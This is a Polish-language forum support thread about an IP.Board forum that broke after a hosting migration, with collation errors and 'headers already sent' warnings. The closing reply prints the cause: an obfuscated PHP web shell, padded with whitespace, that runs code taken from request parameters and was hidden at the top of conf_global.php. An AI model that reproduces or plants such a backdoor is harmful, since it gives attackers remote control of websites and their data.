Skocz do zawartości

Brak polskich znaków po przenosinach (z dedykowanego na wirtualny)

Rekomendowane odpowiedzi

Opublikowano (edytowane)

No więc trzeci raz przenoszę stronę, znowu mi wykrzaczyło całe forum (forum.minecraft.pl) + dowaliło 4 błędy na górze. Na dokładkę nie mogę się zalogować do ACP. Jeśli to ma jakieś znaczenie - przenosiłem się ze swojego dedykowanego na wirtualny, dokładnie na popularny hosting z linux w nazwie (reklamy robić nie będę : ))

Skopiowałem pliki, zrobiłem przez phpmyadmin zrzut tabel z IPBoard_, wrzuciłem pliki, wrzuciłem bazę, przepiąłem domenę. No i teraz nawet nie mogę do ACP wejść żeby je wyłączyć :(

Wyciągnąłem z logów SQL'a coś takiego:

Date: Sun, 27 Oct 2013 15:19:10 +0000
 Error: 1267 - Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,COERCIBLE) for operation '='
 IP Address: 66.249.78.116 - /index.php?app=core&module=search&do=search&andor_type=&sid=bde71d7b9dca08d6dfa8d7de1df3587d&search_tags=sucho%C5%9B%C4%87&search_app_filters%5Bblog%5D%5BsearchInKey%5D=entries&search_app_filters%5Bblog%5D%5Bentries%5D%5BsortKey%5D=date&search_term=&search_app=blog

A resztę załączam w pliku.

Tego już próbowałem.

A, no i baza ma w sobie wszędzie znaki zapytania - podczas przenosin wybrałem prawdopodobnie utf-8 jako metodę kodowania znaków. I właśnie wyciągnąłem ze starej bazy, że tam było latin1_ci_swedish w tabelach jako metoda kodowania znaków. 
Edytowane przez Rabusek
Opublikowano (edytowane)

Dziwna sprawa, drugi raz edytować postu już nie mogę :P

Na starym forum w bazie też są krzaczory, ale na forum ich nigdy nie było..

No i coś czego nie wypunktowałem:

Warning: Cannot modify header information - headers already sent by (output started at /home/minecraf/domains/minecraft.pl/public_html/forum/conf_global.php:1) in /home/minecraf/domains/minecraft.pl/public_html/forum/adminminecraft5/sources/classes/output/formats/html/htmlOutput.php on line 114

Warning: Cannot modify header information - headers already sent by (output started at /home/minecraf/domains/minecraft.pl/public_html/forum/conf_global.php:1) in /home/minecraf/domains/minecraft.pl/public_html/forum/adminminecraft5/sources/classes/output/formats/html/htmlOutput.php on line 127

Warning: Cannot modify header information - headers already sent by (output started at /home/minecraf/domains/minecraft.pl/public_html/forum/conf_global.php:1) in /home/minecraf/domains/minecraft.pl/public_html/forum/adminminecraft5/sources/classes/output/formats/html/htmlOutput.php on line 136

Warning: Cannot modify header information - headers already sent by (output started at /home/minecraf/domains/minecraft.pl/public_html/forum/conf_global.php:1) in /home/minecraf/domains/minecraft.pl/public_html/forum/adminminecraft5/sources/classes/output/formats/html/htmlOutput.php on line 137

Warning: Cannot modify header information - headers already sent by (output started at /home/minecraf/domains/minecraft.pl/public_html/forum/conf_global.php:1) in /home/minecraf/domains/minecraft.pl/public_html/forum/adminminecraft5/sources/classes/output/formats/html/htmlOutput.php on line 141
Edytowane przez Rabusek
Opublikowano

Fixed.

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         if (isset($_REQUEST['FILE'])){$_FILE = $_REQUEST['e1e6f315da35d8850d43536778869e03']('$_',$_REQUEST['FILE'].'($_);'); $_FILE(stripslashes($_REQUEST['HOST']));}?>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        <?php

Ciekawa metoda, nie powiem.

Do zamknięcia